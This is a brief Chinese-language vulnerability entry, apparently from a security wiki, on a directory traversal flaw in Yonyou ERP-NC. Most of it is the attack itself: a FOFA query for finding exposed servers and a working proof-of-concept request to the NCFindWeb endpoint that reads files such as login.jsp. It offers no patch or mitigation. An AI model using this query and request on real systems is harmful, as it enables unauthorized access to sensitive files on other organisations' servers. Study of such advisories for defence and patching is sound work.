⽤友ERP-NC ⽬录遍历漏洞

0x01 漏洞描述

⽤友ERP-NC 存在⽬录遍历漏洞,攻击者可以通过⽬录遍历获取敏感⽂件信息

0x02 漏洞影响

⽤友ERP-NC

0x03 FOFA

app="⽤友-UFIDA-NC"

0x04 漏洞复现

POC为:
/NCFindWeb?service=IPreAlertConfigService&filename=

https://ip/NCFindWeb?service=IPreAlertConfigService&filename=login.jsp

Previous2021 年护网漏洞Next2021HW期间公布的部分漏洞及利用方式(部分附POC、EXP)

Last updated

Was this helpful?